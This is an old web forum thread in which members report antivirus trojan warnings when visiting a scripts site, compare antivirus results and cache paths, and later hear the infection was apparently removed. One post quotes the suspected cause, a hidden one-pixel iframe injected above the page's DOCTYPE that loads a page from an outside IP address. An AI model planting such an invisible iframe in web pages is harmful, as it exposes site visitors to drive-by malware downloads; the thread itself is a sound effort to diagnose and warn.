| Author |
Message |
jakec06
Sergeant


Joined: Jan 30, 2006
Posts: 75
Location: Surrey, UK
|
Posted:
Sun Jun 25, 2006 12:11 pm |
  |
This is just a quick warning. When visiting the Ourscripts.net website I'm getting a virus warning (Downloader Generic.o).
I've tried it on two computers and I'm get the same warning. |
Last edited by jakec06 on Sun Jun 25, 2006 12:49 pm; edited 1 time in total |
|
   |
 |
Black_Spider
Lieutenant


Joined: Aug 06, 2004
Posts: 285
Location: NW USA
|
Posted:
Sun Jun 25, 2006 12:35 pm |
  |
Just by visiting the site? And what av are you using? |
_________________ ßlå¢k §ÞîÐèR |
|
      |
 |
jakec06
Sergeant


Joined: Jan 30, 2006
Posts: 75
Location: Surrey, UK
|
Posted:
Sun Jun 25, 2006 12:47 pm |
  |
Yep.
I'm using McAfee, different versions on the two computers, but I guess the definitions will be the same. |
|
|
   |
 |
XtraX
Lieutenant


Joined: Aug 23, 2003
Posts: 195
|
Posted:
Sun Jun 25, 2006 3:03 pm |
  |
hum... I just visited Ourscripts.net and I got nothing - I'm using norton system works 2006 for my AV, and I got nothing .
Strange...
xtrax |
|
|
   |
 |
RuTHlezz1
Nuke Soldier


Joined: Oct 03, 2005
Posts: 34
|
Posted:
Tue Jun 27, 2006 9:01 am |
  |
I get the same error and it tries to place te file in
C:\Documents and Settings\nhuffman\Local Settings\Temporary Internet Files\Content.IE5\WDUN0927\ourscripts[1].htm |
|
|
    |
 |
jakec06
Sergeant


Joined: Jan 30, 2006
Posts: 75
Location: Surrey, UK
|
Posted:
Tue Jun 27, 2006 10:58 am |
  |
Are you using McAfee as well? |
|
|
   |
 |
Black_Spider
Lieutenant


Joined: Aug 06, 2004
Posts: 285
Location: NW USA
|
Posted:
Wed Jun 28, 2006 2:48 am |
  |
I'm using ZoneAlarm Security Suite and it hasn't detected anything.
Also navigated to the path where the file was getting set and I see nothing, no .htm files. I see a copy of the html file in there, but that's for the cache. |
_________________ ßlå¢k §ÞîÐèR |
|
      |
 |
jakec06
Sergeant


Joined: Jan 30, 2006
Posts: 75
Location: Surrey, UK
|
Posted:
Wed Jun 28, 2006 3:07 am |
  |
There appears to be an iframe right at the top of the page, before even the DOCTYPE is defined.
This is what it looks like:
| Code: |
| iframe src= http://85.249.22.18/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe><br />src= http://85.249.22.18/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter> /iframe<br /> |
Just wondering if this is the cuplrit, or if they are doing something funky on their site. |
|
|
   |
 |
webmistress
Nuke Cadet


Joined: Jun 28, 2006
Posts: 2
Location: TN
|
Posted:
Wed Jun 28, 2006 11:48 am |
  |
I'm getting the same Trojan alert..
Using McAfee Build 8.0.45 (free AOL version)
Trojan Has Been Detected and Cleaned!
The file C:\Documents and Settings\Computer Name\Local Settings\Application Data\Firefox\profiles\2safd.default\Cache\D7CEA8BDd01 was infected by the Geneic Downloader.o trojan and has been deleted to complete the Clean process. |
|
|
   |
 |
scott2500uk
Private


Joined: Oct 08, 2005
Posts: 43
Location: York UK
|
Posted:
Wed Oct 04, 2006 11:14 am |
  |
Just a note that this is still going on and that the site admin has been away during all this and will still be away for some time. |
|
|
       |
 |
Legno_Genova
Private


Joined: Nov 16, 2005
Posts: 40
|
Posted:
Sat Oct 14, 2006 12:17 am |
  |
|
     |
 |
scott2500uk
Private


Joined: Oct 08, 2005
Posts: 43
Location: York UK
|
Posted:
Sat Oct 14, 2006 5:12 am |
  |
I belive the virus has been removed but the site is offline atm. |
|
|
       |
 |
|
|